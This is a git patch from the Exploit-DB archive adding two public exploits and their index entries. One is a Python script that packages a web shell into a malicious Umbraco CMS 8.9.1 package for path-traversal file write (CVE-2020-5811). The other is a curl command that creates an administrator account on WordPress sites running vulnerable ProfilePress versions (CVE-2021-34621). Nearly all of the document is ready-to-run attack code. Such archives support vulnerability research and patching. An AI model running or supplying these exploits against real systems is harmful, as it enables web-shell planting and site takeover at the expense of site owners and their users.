From 688d5586567f748b7985615b4d1f829c0415e1b7 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 1 Sep 2021 05:01:57 +0000
Subject: [PATCH] DB: 2021-09-01

2 changes to exploits/shellcodes

Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
---
 exploits/aspx/webapps/50241.py | 72 ++++++++++++++++++++++++++++++++++
 exploits/php/webapps/50242.sh  | 27 +++++++++++++
 files_exploits.csv             |  2 +
 3 files changed, 101 insertions(+)
 create mode 100755 exploits/aspx/webapps/50241.py
 create mode 100755 exploits/php/webapps/50242.sh
diff --git a/exploits/aspx/webapps/50241.py b/exploits/aspx/webapps/50241.py
new file mode 100755
index 000000000..291933fb0
--- /dev/null
+++ b/exploits/aspx/webapps/50241.py
@@ -0,0 +1,72 @@
+# Exploit Title: Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)
+# Exploit Author: BitTheByte
+# Description: Authenticated path traversal vulnerability.
+# Exploit Research: https://www.tenable.com/security/research/tra-2020-59
+# Vendor Homepage: https://umbraco.com/
+# Version: <= 8.9.1 
+# CVE : CVE-2020-5811
+
+import string
+import random
+import argparse
+import zipfile
+import os
+
+package_xml = f"""<?xml version="1.0" encoding="utf-8"?>
+<umbPackage>
+  <files>
+    <file>
+      <guid>{{filename}}</guid>
+      <orgPath>{{upload_path}}</orgPath>
+      <orgName>{{filename}}</orgName>
+    </file>
+  </files>
+  <info>
+    <package>
+      <name>PoC-{''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(8))}</name>
+      <version>1.0.0</version>
+      <iconUrl></iconUrl>
+      <license url="http://opensource.org/licenses/MIT">MIT License</license>
+      <url>https://example.com</url>
+      <requirements>
+        <major>0</major>
+        <minor>0</minor>
+        <patch>0</patch>
+      </requirements>
+    </package>
+    <author>
+      <name>CVE-2020-5811</name>
+      <website>https://example.com</website>
+    </author>
+    <contributors>
+      <contributor></contributor>
+    </contributors>
+    <readme><![CDATA[]]></readme>
+  </info>
+  <DocumentTypes />
+  <Templates />
+  <Stylesheets />
+  <Macros />
+  <DictionaryItems />
+  <Languages />
+  <DataTypes />
+  <Actions />
+</umbPackage>
+"""
+
+parser = argparse.ArgumentParser(description='CVE-2020-5811')
+parser.add_argument('--shell', type=str, help='Shell file to upload', required=True)
+parser.add_argument('--upload-path', type=str, help='Shell file update path on target server (default=~/../scripts)', default='~/../scripts')
+args = parser.parse_args()
+
+if not os.path.isfile(args.shell):
+  print("[ERROR] please use a correct path for the shell file.")
+
+output_file = "exploit.zip"
+
+package = zipfile.ZipFile(output_file, 'w')  
+package.writestr('package.xml', package_xml.format(filename=os.path.basename(args.shell), upload_path=args.upload_path))
+package.writestr(os.path.basename(args.shell), open(args.shell, 'r').read())
+package.close()
+
+print(f"[DONE] Created Umbraco package: {output_file}")
\ No newline at end of file
diff --git a/exploits/php/webapps/50242.sh b/exploits/php/webapps/50242.sh
new file mode 100755
index 000000000..00f1a8fa6
--- /dev/null
+++ b/exploits/php/webapps/50242.sh
@@ -0,0 +1,27 @@
+# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)
+# Date: 23-08-2021
+# Exploit Author: Numan Rajkotiya
+# Vendor Homepage: https://profilepress.net/
+# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip
+# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13
+	   [2] WordPress 4.7 or higher
+# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928
+# CVE : CVE-2021-34621
+
+#!/bin/bash
+
+# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3 
+# Change the name and password as per your requirement.
+
+URL=$1
+
+curl -X POST $URL"/wp-admin/admin-ajax.php" \
+ -H "Content-Type: application/x-www-form-urlencoded" \
+ -d "reg_username=numan" \
+ -d "reg_email=pwned@numan.com" \
+ -d "reg_password=numan" \
+ -d "reg_password_present=true" \
+ -d "wp_capabilities[administrator]=1" \
+ -d "reg_first_name=pwned" \
+ -d "reg_last_name=numan" \
+ -d "action=pp_ajax_signup"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 76a98195e..d88929950 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -44365,3 +44365,5 @@ id,file,description,date,author,type,platform,port
 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",2021-08-30,"David Utón",webapps,multiple,
 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-30,"Musyoka Ian",webapps,multiple,
 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",2021-08-30,"Abdullah Kala",webapps,php,
+50241,exploits/aspx/webapps/50241.py,"Umbraco CMS 8.9.1 - Path traversal and Arbitrary File Write (Authenticated)",2021-08-31,BitTheByte,webapps,aspx,
+50242,exploits/php/webapps/50242.sh,"WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)",2021-08-31,"Numan Rajkotiya",webapps,php,
